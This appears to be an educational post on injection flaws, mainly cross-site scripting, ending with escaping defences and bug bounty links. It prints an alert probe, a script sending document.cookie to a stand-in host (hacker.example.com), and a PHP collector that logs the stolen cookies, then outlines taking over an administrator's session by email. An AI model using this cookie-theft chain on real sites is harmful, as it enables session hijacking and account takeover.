Injection ---
Injection is one of the oldest classes of vulnerability. It can lead to data loss, data theft and denial of service,
and in the worst case it compromises the whole system.
Injection attacks, especially SQL Injection (SQLi) and Cross-site Scripting (XSS),
are the most dangerous and widespread weaknesses in any application.
Beyond these, there are several other types of injection that a web developer should watch out for.
Using a safe API and positive (allow-list) server-side input validation helps prevent injection.
------------------------------------------------------------------------------------------
<SCRIPT></SCRIPT> <- the tag most commonly used in XSS.
------------------------------------------------------------------------------------------
<Example of the process: how to find out whether a system has an XSS vulnerability>
* Use an email service and send a message containing a short script that opens a pop-up alert reading 'XSS!' when the mail is opened.
receiver: (ex) (victim) (hacker@hacker.com)
sender: (me)
body: <script>alert('XSS!');</script>
(When the server or system has an XSS vulnerability,
the pop-up will open when the victim (receiver) opens the email.)
Once the hacker has found that the target system is vulnerable,
they can send a malicious script to victims and
'try to snatch cookie information from the victims.'
------------------------------------------------------------------------------------------
Example: sending the client's cookie information to the
C2 server (http://hacker.example.com)
------------------------------------------------------------------------------------------
<script>window.location = 'http://hacker.example.com/xss.php?log=' + document.cookie</script>
------------------------------------------------------------------------------------------
This script takes the cookie information of the current page and
passes it in the log parameter of the script on the C&C server
(http://hacker.example.com/xss.php).
------------------------------------------------------------------------------------------
<?php
// Append whatever arrives in the 'log' query parameter to log.txt
$fp = fopen("log.txt", "a+");
fwrite($fp, $_GET['log']);
fclose($fp);
?>
------------------------------------------------------------------------------------------
The example above is the xss.php file on the C&C server: it takes the value of the
log parameter and appends it to log.txt.
When the XSS script runs, it sends the cookie information to the log parameter of xss.php, and the PHP script then takes the cookie information and saves it to a file.
(And of course, that file is readable by anyone :/)
Now the hacker can snatch the administrator's account credential using this information.
-> Send the script (below) to the administrator (who holds the admin credential).
<script>
window.location='http://example.com/xss.php?log=' + document.cookie
</script>
-> The administrator opens the malicious email.
-> When he/she reads the email, the embedded script sends the
cookie information to the C&C server.
-> The cookie information is saved (log.txt) on the hacker's host.
Solution:
(example)
* Replace '<' and '>' with '&lt;' and '&gt;' so the tag is neutralised.
- However, most bulletin boards on web pages allow angle brackets, so input has to go through a rather complicated filtering process.
- XSS has numerous attack points, so there is no perfect defence against it.
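The escaping step from the solution above, as an added example (not code from the original post): a Node.js output encoder that neutralises the probe payload, alongside the '<'/'>'-only version to show why it is not enough on its own for attribute contexts. The function names and the sample input are assumptions made for this example.

```javascript
// Added example (not from the original post): HTML output encoding as the
// defence described above, plus a check of why '<' and '>' alone are not enough.

// Naive version: only the two characters the note mentions.
function escapeAngleBrackets(input) {
  return String(input).replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Fuller version for HTML text and attribute-value contexts: also encode
// '&', '"' and "'" so untrusted input cannot close an attribute or a tag.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
};
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render an untrusted value into a page fragment; only the encoded form is used.
function renderComment(untrustedBody) {
  return '<div class="comment">' + escapeHtml(untrustedBody) + '</div>';
}

// Crude check used below: does the rendered HTML still contain a live <script> tag?
function containsLiveScriptTag(html) {
  return /<\s*script/i.test(html);
}

// Constructed sample input: the probe payload from the note above.
const PROBE = "<script>alert('XSS!');</script>";

// Both encoders defuse the probe, but only escapeHtml also removes the
// quotes an attacker would need to break out of an attribute value.
console.log(renderComment(PROBE));
console.log('naive keeps quotes:', escapeAngleBrackets('a"b') === 'a"b');
```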
Facebook and Google run their own bug bounty programs for white-hat hackers to find XSS vulnerabilities in their systems, and offer to pay from a minimum of $500 up to a million dollars when someone finds one.
(reference)
https://www.facebook.com/whitehat/
http://www.google.com/about/appsecurity/reward-program/
done!